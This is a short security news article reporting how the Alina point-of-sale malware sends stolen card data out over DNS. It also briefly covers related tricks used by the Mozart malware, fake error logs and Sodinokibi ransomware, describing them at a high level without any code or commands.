POS Malware Leverages DNS for Secret Communications

Sophisticated threat actors often tend to hide their malicious communications via innovative techniques, in order to dodge the detection by security solutions. One such attempt was recently made by a Point of Sale (PoS)-targeting malware, that targeted DNS for its communications.

Alina learns the DNS language

Alina, the Point-of-Sale (PoS)-targeting malware that was first detected in 2012, was seen leveraging DNS protocol for malicious communications with its server.
  • In June, Alina POS malware was found using the DNS protocol to send the stolen credit card details to the attacker’s remote servers.
  • On the PoS devices, the malware performs RAM scrapping to find and steal any unencrypted credit card related information. Before sending the card details to C2 servers, the malware validates the card numbers by using Luhn checksum algorithm.
  • The malware also scraps a large number of system processes (including Brain[.]exe, Focus[.]exe, appidt[.]exe, etc.) to steal credit card details.

Misuse of DNS-based communications 

Alina is not the first malware misusing the DNS system for malicious communications. In February, the Mozart malware was found using the DNS protocol (DNS TXT records) for communication with the remote attackers, to avoid detection by security software.

Other techniques for targeting PoS systems

Besides using DNS, several hackers have tried various other tricks to hide malicious activities. 
  • In June, hackers were seen using fake error logs, storing ASCII characters disguised as hexadecimal values. By doing this, it aimed at collecting information about PoS software as well as several other software installed on the victim system.
  • In the same month, the operators of Sodinokibi ransomware picked up the new tactic of scanning for POS data and credit card details (besides it usual data encryption attack), generate extra money from victims.